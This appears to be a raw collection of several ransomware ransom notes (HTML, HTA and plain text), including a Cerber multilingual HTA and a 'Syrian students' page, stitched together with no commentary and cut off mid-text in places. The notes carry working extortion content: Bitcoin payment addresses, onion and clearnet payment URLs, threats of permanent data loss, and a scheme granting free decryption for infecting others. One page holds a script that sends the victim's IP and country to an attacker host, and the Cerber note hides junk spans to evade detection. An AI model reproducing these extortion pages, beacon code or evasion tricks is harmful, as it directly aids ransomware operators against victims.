<html> <head> <meta charset="utf-8"> <title>HOW TO DECRYPT YOUR FILES</title> <style type="text/css"> body { font: 15px Tahoma, sans-serif; margin: 10px; line-height: 25px; background-color: #C1AB8F; } .bold { font-weight: bold; } .xx { border: 1px dashed #000; background: #E3D5F1; } .mark { background: #D0D0E8; padding: 2px 5px; } .header { font-size: 30px; height: 50px; line-height: 50px; font-weight: bold; border-bottom: 10px solid #D0D0E8; } .info { background: #D0D0E8; border-left: 10px solid #00008B; } .alert { background: #FFE4E4; border-left: 10px solid #FF0000; } .private { border: 1px dashed #000; background: #FFFFEF; } .note { height: auto; padding-bottom: 1px; margin: 15px 0; } .note .title { font-weight: bold; text-indent: 10px; height: 30px; line-height: 30px; padding-top: 10px; } .note .mark { background: #A2A2B5; } .note ul { margin-top: 0; } .note pre { margin-left: 15px; line-height: 13px; font-size: 13px; } </style> </head> <body> <div class="header">Your files are encrypted!</div> <div class="note private"> <div class="title">Your personal ID</div> <pre>9F A6 F9 7B AA 19 E3 C7 5F 95 8C 7A 6A 61 12 BF 52 41 D0 54 74 73 16 94 14 E4 4B F4 7F 75 28 B3 DF C9 49 CF 4B 5D ED 02 99 A4 58 31 DB DA D7 5C E6 FC 60 FA 39 69 99 B6 13 47 C0 1A C9 1C 8F 4D 12 B8 0C 65 2C 78 B5 56 1F 51 D1 9C C6 B7 B0 C1 1B 59 6F 2C B5 B3 F4 64 36 DF DA C2 81 6B C5 B9 B6 D4 AE 69 72 64 6C 16 24 FD 19 7D 2A 1F A3 F4 C3 97 61 8A BD CD 73 43 BC 39 45 15 AE 4D 23 5C </pre><!-- !!! CTpoкy He MeHяTb !!! --> </div> <div class="bold"> <div align="left">All your important data has been encrypted.</div> </div> <div class="bold">To recover data you need decryptor.</div> <div> <h2 align="center">To get the decryptor you should:</h2> <h1 align="left">pay for decrypt:</h1> <div class="note xx"> <div align="left"> <h1>site for buy bitcoin:<br> </h1> </div> <div align="left"> <strong>Buy 1 BTC on one of these sites</strong> </div> <div align="left"> <ol> <li><strong>https://localbitcoins.com</strong></li> <li><strong>https://www.coinbase.com</strong></li> <li><strong>https://xchange.cc</strong></li> </ol> </div> <div align="left"> <h1>bitcoin adress for pay:<br> </h1> </div> <div align="left">1FuCGsCmmGWZnDkzg2aa7y6RvK3KP7TG7K</div> <div align="left"><strong>Send 1 BTC for decrypt</strong></div> </div> <div> <h1>After the payment: </h1> </div> <div><p>Send screenshot of payment to <span class="mark">[email protected]</span>. In the letter include your personal ID (look at the beginning of this document).</p> </div> <div> <h1 align="center">After you will receive a decryptor and instructions</h1> </div> <div class="note alert"> <div class="title">Attention!</div> <ul><li>No Payment = No decryption</li> <li>You really get the decryptor after payment</li> <li>We give you the opportunity to decipher 1 file free of charge!</li> <li>You can make sure that the service really works and after payment for the «Decryptor» program you can actually decrypt the files!</li> <li>Do not attempt to remove the program or run the anti-virus tools</li> <li>Attempts to self-decrypting files will result in the loss of your data</li> <li>Decoders other users are not compatible with your data, because each user's unique encryption key</li> </ul> </div> </body> </html>

NOT YOUR LANGUAGE? USE https://translate.google.com What happened to your files ? All of your files were protected by a strong encryption with RSA4096 More information about the encryption keys using RSA4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem) How did this happen ? !!! Specially for your PC was generated personal RSA4096 Key , both public and private. !!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet. !!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server What do I do ? So , there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way If You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: 1 - http://sondr5344ygfweyjbfkw4fhsefv.heliofetch.at/229B45C26DC9B9 2 - http://gfkuwflbhsjdabnu4nfukerfqwlfwr4rw.ringbalor.com/229B45C26DC9B9 3 - http://oehknf74ohqlfnpq9rhfgcq93g.hateflux.com/229B45C26DC9B9 If for some reasons the addresses are not available, follow these steps: 1 - Download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en 2 - After a successful installation, run the browser 3 - Type in the address bar: xlowfznrg4wf7dli.onion/229B45C26DC9B9 4 - Follow the instructions on the site IMPORTANT INFORMATION Your personal pages http://sondr5344ygfweyjbfkw4fhsefv.heliofetch.at/229B45C26DC9B9 http://gfkuwflbhsjdabnu4nfukerfqwlfwr4rw.ringbalor.com/229B45C26DC9B9 http://oehknf74ohqlfnpq9rhfgcq93g.hateflux.com/229B45C26DC9B9 Your personal page Tor-Browser xlowfznrg4wf7dli.ONION/229B45C26DC9B9

<!DOCTYPE html><html lang="en"> <head> <title>Warning Message</title> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css"> <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script> <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script> <script src="https://rendro.github.io/countdown/javascripts/jquery.countdown.js"></script> <style>p{padding: 5px 0px;}</style> </head> <body> <div id="paid" class="container hide"> <div class="row"> <div class="col-sm-12"> <h1>Thank you for your payment</h1> <br><h4>We know that we forced you to pay, but be sure that the payment was for a good cause, The money you gave will be used for food, medicine and shelter to those in need.</h4> <br><div> To get your decryption code, please visit one of the links below: <br><br><ul><li><a href=http://3hnuhydu4pd247qb.onion.to/getcode/3058e0f336e45d623937f1952ecb938e target=_blank>http://3hnuhydu4pd247qb.onion.to/getcode/3058e0f336e45d623937f1952ecb938e</a></li><li><a href=http://3hnuhydu4pd247qb.onion.cab/getcode/3058e0f336e45d623937f1952ecb938e target=_blank>http://3hnuhydu4pd247qb.onion.cab/getcode/3058e0f336e45d623937f1952ecb938e</a></li><li><a href=http://3hnuhydu4pd247qb.torstorm.org/getcode/3058e0f336e45d623937f1952ecb938e target=_blank>http://3hnuhydu4pd247qb.torstorm.org/getcode/3058e0f336e45d623937f1952ecb938e</a></li><li><a href=http://3hnuhydu4pd247qb.onion.nu/getcode/3058e0f336e45d623937f1952ecb938e target=_blank>http://3hnuhydu4pd247qb.onion.nu/getcode/3058e0f336e45d623937f1952ecb938e</a></li><li><a href=http://3hnuhydu4pd247qb.tor2web.org/getcode/3058e0f336e45d623937f1952ecb938e target=_blank>http://3hnuhydu4pd247qb.tor2web.org/getcode/3058e0f336e45d623937f1952ecb938e</a></li></ul> </div><div> If none of the links work, please download and install TOR browser from this link (<a href="https://www.torproject.org/download/download-easy.html.en" target="_blank">Download Tor Browser</a>) and after opening Tor browser visit one of this links: <br><br><ul><li><a href=http://3hnuhydu4pd247qb.onion/getcode/3058e0f336e45d623937f1952ecb938e target=_blank>http://3hnuhydu4pd247qb.onion/getcode/3058e0f336e45d623937f1952ecb938e</a></li></ul> </div><p> When you visit your link you will get your personal unique decryption code, copy & paste it to the window and all of your files will be decrypted immediately. </p></div></div></div><div id="notpaid" class="jumbotron text-center"> <h1 style="color: red; margin: 0px;">Warning Message!!</h1> <p>We are sorry to say that your computer and <strong style="color: red;">your files have been encrypted</strong>, <BR> but wait, don't worry. There is a way that you can restore your computer and all of your files</p><div class="countdown"> <h3 id="clock" style="color: green;"></h3> Time remain when your files will lost forever! </div></div><div id="notpaid1" class="container notpaid"> <div class="row"> <div class="col-sm-12 alert-info text-center"> <h3>Your personal unique ID: <strong style="text-decoration: underline; color: red;">3058e0f336e45d623937f1952ecb938e</strong></h3> <h3>Please send at least <strong style="text-decoration: underline; color: red;">1.0 Bitcoin</strong> to address <strong style="text-decoration: underline; color: red;">1G21kKmUJbMjL1YueHN6aE28ZLpY4t2Pn3</strong></h3> <br><h4><button id="chkbalance">Click to check your Balance</button><br><small><strong id="balance"></strong></small></h4> </div></div><div class="row"> <div class="col-sm-6"> <h3>Restoring your files - The fast and easy way</h3> <p>To get your files fast, please transfer <strong style="text-decoration: underline; color: red;">1.0 Bitcoin</strong> to our wallet address <strong style="text-decoration: underline; color: red;">1G21kKmUJbMjL1YueHN6aE28ZLpY4t2Pn3</strong>. When we will get the money, we will immediately give you your private decryption key. Payment should be confirmed in about 2 hours after payment made.</p></div><div class="col-sm-6"> <h3>Restoring your files - The nasty way</h3> <p>Send the link below to other people, if two or more people will install this file and pay, we will decrypt your files for free.</p><input type="text" value="https://3hnuhydu4pd247qb.onion.to/r/3058e0f336e45d623937f1952ecb938e" size="80%" style="color: blue;"/> </div></div><div class="row"> <div class="col-sm-12"> <h3>Get code to restore your files</h3> <div> To get your decryption code, please visit one of the links below: <br><br><ul><li><a href=http://3hnuhydu4pd247qb.onion.to/getcode/3058e0f336e45d623937f1952ecb938e target=_blank>http://3hnuhydu4pd247qb.onion.to/getcode/3058e0f336e45d623937f1952ecb938e</a></li><li><a href=http://3hnuhydu4pd247qb.onion.cab/getcode/3058e0f336e45d623937f1952ecb938e target=_blank>http://3hnuhydu4pd247qb.onion.cab/getcode/3058e0f336e45d623937f1952ecb938e</a></li><li><a href=http://3hnuhydu4pd247qb.torstorm.org/getcode/3058e0f336e45d623937f1952ecb938e target=_blank>http://3hnuhydu4pd247qb.torstorm.org/getcode/3058e0f336e45d623937f1952ecb938e</a></li><li><a href=http://3hnuhydu4pd247qb.onion.nu/getcode/3058e0f336e45d623937f1952ecb938e target=_blank>http://3hnuhydu4pd247qb.onion.nu/getcode/3058e0f336e45d623937f1952ecb938e</a></li><li><a href=http://3hnuhydu4pd247qb.tor2web.org/getcode/3058e0f336e45d623937f1952ecb938e target=_blank>http://3hnuhydu4pd247qb.tor2web.org/getcode/3058e0f336e45d623937f1952ecb938e</a></li></ul> </div><div> If none of the links work, please download and install TOR browser from this link (<a href="https://www.torproject.org/download/download-easy.html.en" target="_blank">Download Tor Browser</a>) and after opening Tor browser visit one of this links: <br><br><ul><li><a href=http://3hnuhydu4pd247qb.onion/getcode/3058e0f336e45d623937f1952ecb938e target=_blank>http://3hnuhydu4pd247qb.onion/getcode/3058e0f336e45d623937f1952ecb938e</a></li></ul> </div><p> When you visit your link you will get your personal unique decryption code, copy & paste it to the window and all of your files will be decrypted immediately. </p></div></div><div class="row"> <div class="col-sm-4"> <h3>What we did?</h3> <p> We had encrypted all of your important images, documents, videos and all other files on your computer. We used a very strong encryption algorithm that used by all governments all over the world <a href="https://en.wikipedia.org/wiki/Advanced_Encryption_Standard" target="_blank">(Encryption -Wikipedia)</a>. We store your personal decryption code to your files on our servers and we are the only ones that can decrypt your files. Please don't try to be smart, anything other than payment will cause damage to your files and the files will be lost forever!!! </p><p class="alert-danger text-center" style="padding: 5px 10px"> If you will not pay for the next 7 days, the decryption key will be deleted and your files will be lost forever. </p></div><div class="col-sm-7"> <h3>Why we do that?</h3> <p> We are a group of computer science students from Syria, as you probably know Syria is having bad time for the last 5 years. Since 2011 we have more the half million people died and over 5 million refugees. Each part of our team has lost a dear member from his family. <strong>I personally have lost both my parents and my little sister in 2015.</strong> The sad part of this war is that all the parts keep fighting but eventually we the poor and simple people suffer and watching our family and friends die each day. <br>The world remained silent and no one helping us so we decided to take an action. <a href="https://en.wikipedia.org/wiki/Syrian_Civil_War" target="_blank">(Syria War in Wikipedia)</a> <br></p><p class="alert-success text-center"> Be perfectly sure that all the money that we get goes to food, medicine, shelter to our people. <br>We are extremely sorry that we forcing you to pay but that's the only way that we can keep living. </p></div></div><div class="row"> <div class="col-sm-12"> <h3>How to buy Bitcoins?</h3> <p> If you aren't familiar with Bitcoin and don't know what is it, please visit the official Bitcoin website (<a href='https://bitcoin.org/en/getting-started' target="_blank">https://bitcoin.org/en/getting-started</a>), follow the steps and you'll get your Bitcoins. <br>To understand more you can check also on the FAQ page (<a href='https://bitcoin.org/en/faq' target='_blank'>https://bitcoin.org/en/faq</a>). <br>Please check this website (<a href='https://coinatmradar.com/' target='_blank'>https://coinatmradar.com/</a>) where you can find Bitcoin ATM all over the world. </p></div></div><div class="row"> <div class="col-sm-12"> <h3>Full list of encrypted files</h3> <textarea style="width: 100%; height: 400px;"></textarea> <br><br><br><br></div></div></div><script>function check(){$.get("https://blockchain.info/q/addressbalance/1G21kKmUJbMjL1YueHN6aE28ZLpY4t2Pn3?confirmations=3", function (data){data=data / 100000000; if (data >=1.0){$("#paid").removeClass("hide"); $("#notpaid").addClass("hide"); $("#notpaid1").addClass("hide");}else{$("#balance").html("Current balance is: " + data + " Bitcoins");}});}$("#chkbalance").on("click", function (){check();}); $(function (){check(); $('#clock').countdown({date: "Dec 20, 2016 15:06:55"});}); $(document).ready(function (){$.getJSON("http://freegeoip.net/json/", function (data){$.get("https://3hnuhydu4pd247qb.onion.to/pixel/3058e0f336e45d623937f1952ecb938e/" + data.ip + "/" + data.country_code + "/" + data.country_name, function (){});});}); </script> </body></html>

<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>C&#069;RBE&#82; &#82;ANSOMWA&#82;&#069;: Instructi&#111;ns</title> <HTA:APPLICATION APPLICATIONNAME="i" SCROLL="yes" SINGLEINSTANCE="yes" WINDOWSTATE="maximize"> <style> a { color: #04a; text-decoration: none; } a:hover { text-decoration: underline; } body { background-color: #e7e7e7; color: #222; font-family: "Lucida Sans Unicode", "Lucida Grande", sans-serif; font-size: 13pt; line-height: 19pt; } body, h1 { margin: 0; padding: 0; } hr { color: #bda; height: 2pt; margin: 1.5%; } h1 { color: #555; font-size: 14pt; } ol { padding-left: 2.5%; } ol li { padding-bottom: 13pt; } small { color: #555; font-size: 11pt; } ul { list-style-type: none; margin: 0; padding: 0; } .button { color: #04a; cursor: pointer; } .button:hover { text-decoration: underline; } .container { background-color: #fff; border: 2pt solid #c7c7c7; margin: 5%; min-width: 850px; padding: 2.5%; } .header { border-bottom: 2pt solid #c7c7c7; margin-bottom: 2.5%; padding-bottom: 2.5%; } .h { display: none; } .hr { background: #bda; display: block; height: 2pt; margin-top: 1.5%; margin-bottom: 1.5%; overflow: hidden; width: 100%; } .info { background-color: #efe; border: 2pt solid #bda; display: inline-block; padding: 1.5%; text-align: center; } .updating { color: red; display: none; padding-left: 35px; background: url('data:image/gif;base64,R0lGODlhGQAZAKIEAMzMzJmZmTMzM2ZmZgAAAAAAAAAAAAAAACH/C05FVFNDQVBFMi4wAwEAAAAh+QQFAAAEACwAAAAAGQAZAAADVki63P4wSEiZvLXemRf4yhYoQ0l9aMiVLISCDms+L/DIwwnfc+c3qZ9g6Hn5hkhF7YgUKI2dpvNpExJ/WKquSoMCvd9geDeuBpcuGFrcQWep5Df7jU0AACH5BAUAAAQALAoAAQAOABQAAAMwSLDU/iu+Gdl0FbTAqeXg5YCdSJCBuZVqKw5wC8/qHJv2IN+uKvytn9AnFBCHx0cCACH5BAUAAAQALAoABAAOABQAAAMzSLoEzrC5F9Wk9YK6Jv8gEYzgaH4myaVBqYbfIINyHdcDI+wKniu7YG+2CPI4RgFI+EkAACH5BAUAAAQALAQACgAUAA4AAAMzSLrcBNDJBeuUNd6WwXbWtwnkFZwMqUpnu6il06IKLChDrsxBGufAHW0C1IlwxeMieEkAACH5BAUAAAQALAEACgAUAA4AAAM0SLLU/lAtFquctk6aIe5gGA1kBpwPqVZn66hl1KINPDRB3sxAGufAHc0C1IkIxcARZ4QkAAAh+QQFAAAEACwBAAQADgAUAAADMUhK0vurSfiko8oKHC//yyCCYvmVI4cOZAq+UCCDcv3VM4cHCuDHOZ/wI/xxigDQMAEAIfkEBQAABAAsAQABAA4AFAAAAzNIuizOkLgZ13xraHVF1puEKWBYlUP1pWrLBLALz+0cq3Yg324PAUAXcNgaBlVGgPAISQAAIfkEBQAABAAsAQABABQADgAAAzRIujzOMBJHpaXPksAVHoogMlzpZWK6lF2UjgobSK9AtjSs7QTg8xCfELgQ/og9I1IxXCYAADs=') left no-repeat; } #change_language { float: right; } #change_language, #texts div { display: none; } </style> </head> <body> <div class="container"> <div class="header"> <a id="change_language" href="#" onclick="return changeLanguage1();" title="English">&#9745; English</a> <h1>C&#069;&#82;BE&#82; &#82;ANSOMWA&#82;&#069;</h1> <small id="title">Instructions</small> </div> <div id="languages"> <p>&#9745; Select your language</p> <ul> <li><a href="#" title="English" onclick="return showBlock('en');">English</a></li> <li><a href="#" title="Arabic" onclick="return showBlock('ar');">العربية</a></li> <li><a href="#" title="Chinese" onclick="return showBlock('zh');">中文</a></li> <li><a href="#" title="Dutch" onclick="return showBlock('nl');">Nederlands</a></li> <li><a href="#" title="French" onclick="return showBlock('fr');">Français</a></li> <li><a href="#" title="German" onclick="return showBlock('de');">Deutsch</a></li> <li><a href="#" title="Italian" onclick="return showBlock('it');">Italiano</a></li> <li><a href="#" title="Japanese" onclick="return showBlock('ja');">日本語</a></li> <li><a href="#" title="Korean" onclick="return showBlock('ko');">한국어</a></li> <li><a href="#" title="Polish" onclick="return showBlock('pl');">Polski</a></li> <li><a href="#" title="Portuguese" onclick="return showBlock('pt');">Português</a></li> <li><a href="#" title="Spanish" onclick="return showBlock('es');">Español</a></li> <li><a href="#" title="Turkish" onclick="return showBlock('tr');">Türkçe</a></li> </ul> </div> <div id="texts"> <div id="en"> <p>Can't yo<span class="h">4</span>u find the necessary files?<br>Is the c<span class="h">exKM</span>ontent of your files not readable?</p> <p>It is normal be<span class="h">YBdf5niq</span>cause the files' names and the data in your files have been encryp<span class="h">mVjKo2</span>ted by "Ce<span class="h">5ef</span>r&#98;er&nbsp;Rans&#111;mware".</p> <p>It me<span class="h">UoGUjxs</span>ans your files are NOT damage<span class="h">q</span>d! Your files are modified only. This modification is reversible.<br>F<span class="h">TduV</span>rom now it is not poss<span class="h">z</span>ible to use your files until they will be decrypted.</p> <p>The only way to dec<span class="h">gg0bhyRoE2</span>rypt your files safely is to &#98;uy the special decryption software "C<span class="h">JktSg9rK7</span>er&#98;er&nbsp;Decryptor".</p> <p>Any attempts to rest<span class="h">grV1ymBma3</span>ore your files with the thir<span class="h">yO</span>d-party software will be fatal for your files!</p> <hr> <p class="w331208">You can proc<span class="h">vKbwm</span>eed with purchasing of the decryption softw<span class="h">p4QSE</span>are at your personal page:</p> <p><span class="info"><span class="updating">Ple<span class="h">zK7Pcdxe</span>ase wait...</span><a class="url" href="http://p27dokhpz2n7nvgr.1hpvzl.top/F26E-3268-3C90-0446-9BDB" target="_blank">http://p27dokhpz2n7nvgr.1hpvzl.top/F26E-3268-3C90-0446-9BDB</a><hr><a href="http://p27dokhpz2n7nvgr.1pglcs.top/F26E-3268-3C90-0446-9BDB" target="_blank">http://p27dokhpz2n7nvgr.1pglcs.top/F26E-3268-3C90-0446-9BDB</a><hr><a href="http://p27dokhpz2n7nvgr.1cewld.top/F26E-3268-3C90-0446-9BDB" target="_blank">http://p27dokhpz2n7nvgr.1cewld.top/F26E-3268-3C90-0446-9BDB</a><hr><a href="http://p27dokhpz2n7nvgr.1js3tl.top/F26E-3268-3C90-0446-9BDB" target="_blank">http://p27dokhpz2n7nvgr.1js3tl.top/F26E-3268-3C90-0446-9BDB</a><hr><a href="http://p27dokhpz2n7nvgr.1ajohk.top/F26E-3268-3C90-0446-9BDB" target="_blank">http://p27dokhpz2n7nvgr.1ajohk.top/F26E-3268-3C90-0446-9BDB</a></span></p> <p>If t<span class="h">3M</span>his page cannot be opened &nbsp;<span class="button" onclick="return updUrl('en');">cli<span class="h">BQl76</span>ck here</span>&nbsp; to get a new addr<span class="h">Fl</span>ess of your personal page.<br><br>If the addre<span class="h">MdBCBhr2f2</span>ss of your personal page is the same as befo<span class="h">ytjQ8Ame</span>re after you tried to get a new one,<br>you c<span class="h">RIx</span>an try to get a new address in one hour.</p> <p>At th<span class="h">2fkqx5ymBl</span>is p&#097;ge you will receive the complete instr<span class="h">Q</span>uctions how to buy the decrypti<span class="h">g8Y0YPSf</span>on software for restoring all your files.</p> <p>Also at this p&#097;ge you will be able to res<span class="h">wR</span>tore any one file for free to be sure "Cer&#98;e<span class="h">6S</span>r&nbsp;Decryptor" will help you.</p> <hr> <p>If your per<span class="h">Ttx</span>sonal page is not availa<span class="h">w</span>ble for a long period there is another way to open your personal page - insta<span class="h">woWTOU</span>llation and use of Tor&nbsp;Browser:</p> <ol> <li>run your Inte<span class="h">OtpbTs</span>rnet browser (if you do not know wh&#097;t it is run the Internet&nbsp;Explorer);</li> <li>ent<span class="h">P</span>er or copy the &#097;ddress <a href="https://www.torproject.org/download/download-easy.html.en" target="_blank">https://www.torproject.org/downlo&#097;d/download-easy.html.en</a> into the address bar of your browser &#097;nd press ENTER;</li> <li>wait for the site load<span class="h">Z1zoRKH</span>ing;</li> <li>on the site you will be offered to do<span class="h">lyqhY60RRM</span>wnload Tor&nbsp;Browser; download and run it, follow the installation instructions, wait until the installation is completed;</li> <li>ru<span class="h">tt0Sn</span>n Tor&nbsp;Browser;</li> <li>connect with the butt<span class="h">w6EtszI</span>on "Connect" (if you use the English version);</li> <li>a normal Internet bro<span class="h">IlkcK</span>wser window will be opened &#097;fter the initialization;</li> <li>type or copy the add<span class="h">gsCCHf</span>ress <br><span class="info">http://p27dokhpz2n7nvgr.onion/F26E-3268-3C90-0446-9BDB</span><br> in this browser address bar;</li> <li>pre<span class="h">vSeb6Tip0</span>ss ENTER;</li> <li>the site sho<span class="h">sa3</span>uld be loaded; if for some reason the site is not lo<span class="h">XBZ6USgbzV</span>ading wait for a moment and try again.</li> </ol> <p>If you have any pr<span class="h">iJqVQb5yN</span>oblems during installation or use of Tor&nbsp;Browser, please, visit <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> and type request in the searc<span class="h">b8HgYPnr</span>h bar "Install Tor&nbsp;Browser Windows" and you will find a lot of training videos about Tor&nbsp;Browser installation and use.</p> <hr> <p><strong>Addit<span class="h">nJ4</span>ional information:</strong></p> <p>You will fi<span class="h">l8QqF</span>nd the instru<span class="h">e0drX</span>cti&#111;ns ("*_READ_THIS_FILE_*.hta") for re<span class="h">q255</span>st&#111;ring y&#111;ur files in &#097;ny f<span class="h">qmzJ0C2rFA</span>&#111;lder with your enc<span class="h">KETQgOTGV</span>rypted files.</p> <p>The instr<span class="h">BJDF</span>ucti&#111;ns "*_READ_THIS_FILE_*.hta" in the f<span class="h">7Mw8w</span>&#111;lder<span class="h">zNpRJm0y</span>s with your encry<span class="h">9MMcBw5sSF</span>pted files are not vir<span class="h">ny4w</span>uses! The instruc<span class="h">h</span>tions "*_READ_THIS_FILE_*.hta" will he<span class="h">YNMhLsEM9E</span>lp you to dec<span class="h">Qdrjs2qT</span>rypt your files.</p> <p>Remembe<span class="h">sGVcc</span>r! The w&#111;rst si<span class="h">cWwa</span>tu&#097;tion already happ<span class="h">vDQiZ</span>ened and n&#111;w the future of your files de<span class="h">Ni4n8grD6</span>pends on your determ<span class="h">zp0</span>ination and speed of your actions.</p> </div> <div id="ar" style="direction: rtl;"> <p>لا يمكنك العثور على الملفات الضرورية؟<br>هل محتوى الملفات غير قابل للقراءة؟</p> <p>هذا أمر طبيعي لأن أسماء الملفات والبيانات في الملفات قد تم تشفيرها بواسطة "Cer&#98;er&nbsp;Rans&#111;mware".</p> <p>وهذا يعني أن الملفات الخاصة بك ليست تالفة! فقد تم تعديل ملفاتك فقط. ويمكن التراجع عن هذا.<br>ومن الآن فإنه لا يكن استخدام الملفات الخاصة بك حتى يتم فك تشفيرها.</p> <p>الطريقة الوحيدة لفك تشفير ملفاتك بأمان هو أن تشتري برنامج فك التشفير المتخصص "Cer&#98;er&nbsp;Decryptor".</p> <p>إن أية محاولات لاستعادة الملفات الخاصة بك بواسطة برامج من طرف ثالث سوف تكون مدمرة لملفاتك!</p> <hr> <p>يمكنك الشروع في شراء برنامج فك التشفير من صفحتك الشخصية:</p> <p><span class="info"><span class="updating">أرجو الإنتظار...</span><a class="url" href="http://p27dokhpz2n7nvgr.1hpvzl.top/F26E-3268-3C90-0446-9BDB" target="_blank">http://p27dokhpz2n7nvgr.1hpvzl.top/F26E-3268-3C90-0446-9BDB</a><hr><a href="http://p27dokhpz2n7nvgr.1pglcs.top/F26E-3268-3C90-0446-9BDB" target="_blank">http://p27dokhpz2n7nvgr.1pglcs.top/F26E-3268-3C90-0446-9BDB</a><hr><a href="http://p27dokhpz2n7nvgr.1cewld.top/F26E-3268-3C90-0446-9BDB" target="_blank">http://p27dokhpz2n7nvgr.1cewld.top/F26E-3268-3C90-0446-9BDB</a><hr><a href="http://p27dokhpz2n7nvgr.1js3tl.top/F26E-3268-3C90-0446-9BDB" target="_blank">http://p27dokhpz2n7nvgr.1js3tl.top/F26E-3268-3C90-0446-9BDB</a><hr><a href="http://p27dokhpz2n7nvgr.1ajohk.top/F26E-3268-3C90-0446-9BDB" target="_blank">http://p27dokhpz2n7nvgr.1ajohk.top/F26E-3268-3C90-0446-9BDB</a></span></p> <p>في حالة تعذر فتح هذه الصفحة &nbsp;<span class="button" onclick="return updUrl('ar');">انقر هنا</span>&nbsp; لإنشاء عنوان جديد لصفحتك الشخصية.</p> <p>في هذه الصفحة سوف تتلقى تعليمات كاملة حول كيفية شراء برنامج فك التشفير لاستعادة جميع الملفات الخاصة بك.</p> <p>في هذه الصفحة أيضًا سوف تتمكن من استعادة ملف واحد بشكل مجاني للتأكد من أن "Cer&#98;er&nbsp;Decryptor" سوف يساعدك.</p> <hr> <p>إذا كانت صفحتك الشخصية غير متاحة لفترة طويلة فإن ثمّة طريقة أخرى لفتح صفحتك الشخصية - تحميل واستخدام متصفح Tor:</p> <ol> <li>قم بتشغيل متصفح الإنترنت الخاص بك (إذا كنت لا تعرف ما هو قم بتشغيل إنترنت إكسبلورر);</li> <li>قم بكتابة أو نسخ العنوان <a href="https://www.torproject.org/download/download-easy.html.en" target="_blank">https://www.torproject.org/download/download-easy.html.en</a> إلى شريط العنوان في المستعرض الخاص بك ثم اضغط ENTER;</li> <li>انتظر لتحميل الموقع;</li> <li>سوف يعرض عليك الموقع تحميل متصفح Tor. قم بتحميله وتشغيله، واتبع تعليمات التثبيت، وانتظر حتى اكتمال التثبيت;</li> <li>قم بتشغيل متصفح Tor;</li> <li>اضغط على الزر "Connect" (إذا كنت تستخدم النسخة الإنجليزية);</li> <li>سوف تُفتح نافذة متصفح الإنترنت العادي بعد البدء;</li> <li>قم بكتابة أو نسخ العنوان <br><span class="info">http://p27dokhpz2n7nvgr.onion/F26E-3268-3C90-0446-9BDB</span><br> في شريط العنوان في المتصفح;</li> <li>اضغط ENTER;</li> <li>يجب أن يتم تحميل الموقع؛ إذا لم يتم تحميل الموقع لأي سبب، انتظر للحظة وحاول مرة أخرى.</li> </ol> <p>إذا كان لديك أية مشكلات أثناء عملية التثبيت أو استخدام متصفح Tor، يُرجى زيارة <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> واكتب الطلب "install tor browser windows" أو "تثبيت نوافذ متصفح Tor" في شريط البحث، وسوف تجد الكثير من أشرطة الفيديو للتدريب حول تثبيت متصفح Tor واستخدامه.</p> <hr> <p><strong>معلومات إضافية:</strong></p> <p>سوف تجد إرشادات استعادة الملفات الخاصة بك ("*_READ_THIS_FILE_*") في أي مجلد مع ملفاتك المشفرة.</p> <p>الإرشادات ("*_READ_THIS_FILE_*") الموجودة في المجلدات مع ملفاتك المشفرة ليست فيروسات والإرشادات ("*_READ_THIS_FILE_*") سوف تساعدك على فك تشفير الملفات الخاصة بك.</p> <p>تذكر أن أسوأ موقف قد حدث بالفعل، والآن مستقبل ملفاتك يعتمد على عزيمتك وسرعة الإجراءات الخاصة بك.</p> </div> <div id="zh"> <p>您找不到所需的文件？<br>您文件的内容无法阅读？</p> <p>这是正常的，因为您文件的文件名和数据已经被“Cer&#98;er&nbsp;Rans&#111;mware”加密了。</p> <p>这意味着您的文件并没有损坏！您的文件只是被修改了，这个修改是可逆的，解密之前您无法使用您的文件。</p> <p>安全�

CERBER RAN$OMWARE --- YOUR DOCUMENTS, PHOTOS, DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! --- The only way to decrypt your files is to receive the private key and decryption program. To receive the private key and decryption program go to any decrypted folder, inside there is the special file (*_READ_THIS_FILE_*) with complete instructions how to decrypt your files. If you cannot find any (*_READ_THIS_FILE_*) file at your PC, follow the instructions below: --- 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://p27dokhpz2n7nvgr.onion/F26E-3268-3C90-0446-9BDB Note! This page is available via "Tor Browser" only. --- Also you can use temporary addresses on your personal page without using "Tor Browser". --- 1. http://p27dokhpz2n7nvgr.1hpvzl.top/F26E-3268-3C90-0446-9BDB 2. http://p27dokhpz2n7nvgr.1pglcs.top/F26E-3268-3C90-0446-9BDB 3. http://p27dokhpz2n7nvgr.1cewld.top/F26E-3268-3C90-0446-9BDB 4. http://p27dokhpz2n7nvgr.1js3tl.top/F26E-3268-3C90-0446-9BDB 5. http://p27dokhpz2n7nvgr.1ajohk.top/F26E-3268-3C90-0446-9BDB --- Note! These are temporary addresses! They will be available for a limited amount of time!

NOT YOUR LANGUAGE? USE https://translate.google.com What happened to your files ? All of your files were protected by a strong encryption with AES More information about the encryption keys using AES can be found here: http://en.wikipedia.org/wiki/AES How did this happen ? !!! Specially for your PC was generated personal AES KEY, both public and private. !!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet. !!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server What do I do ? So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way. If You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment. For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: 1. 